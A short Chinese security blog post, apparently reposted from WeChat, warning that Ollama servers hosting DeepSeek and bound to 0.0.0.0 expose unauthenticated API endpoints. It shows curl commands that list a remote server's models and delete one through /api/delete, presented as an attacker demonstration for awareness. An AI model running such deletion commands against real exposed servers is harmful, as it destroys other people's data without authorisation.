本地部署deepseek后，模型被人删了？

2025年2月23日13:20:25评论11 views字数 765阅读2分33秒阅读模式

大家在本地通过ollama部署deepseek后，直接就通过API对接应用了。如果没有做任何防护，是非常危险的。

默认的 ollama 服务只对 127.0.0.1 开放了 11434 端口。其它客户端是无法访问 ollama 服务器的。此时 ollama 服务是安全的，但其它客户端无法访问服务器。

我们假定ollama服务对API解除限制对所有客户端开放，此时 ollama 服务器会修改启动参数：

$ exportOLLAMA_HOST=http://0.0.0.0:11434$ ollama serve

默认的 ollama API 服务包含了 pull、create、delete 等高危操作。用户可以通过 API 请求删除服务器上部署的任何模型！

先以攻击者身份，演示远程删除一个模型。先通过 /api/tags 列出服务器上部署了哪些模型：

$ curl http://deepseek.vip:11434/api/tags | python -m json.tool

/api/tags 请求会列出服务器中的所有模型，我们以 deepseek-r1:1.5b 为例，模拟攻击者远程删除模型。

curl -X DELETE http://deepseek.vip:11434/api/delete -d '{  "model": "deepseek-r1:1.5b"}'

通过 /api/delete 接口，模拟删除了 deepseek-r1:1.5b 模型。如果 delete API 被滥用，你辛辛苦苦花了很大功夫搭建的大模型分分钟就被人远程删了。

虽然在 ollama API 请求日志中有IP记录，可以追责，但造成服务中断影响还是存在的。关键是你的模型有没有备份，671B的模型有403G大小，重新下载可是要花很长时间的。

（挖坑完毕！）

全文完。

原文始发于微信公众号（生有可恋）：本地部署deepseek后，模型被人删了？

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

同声传译案例分享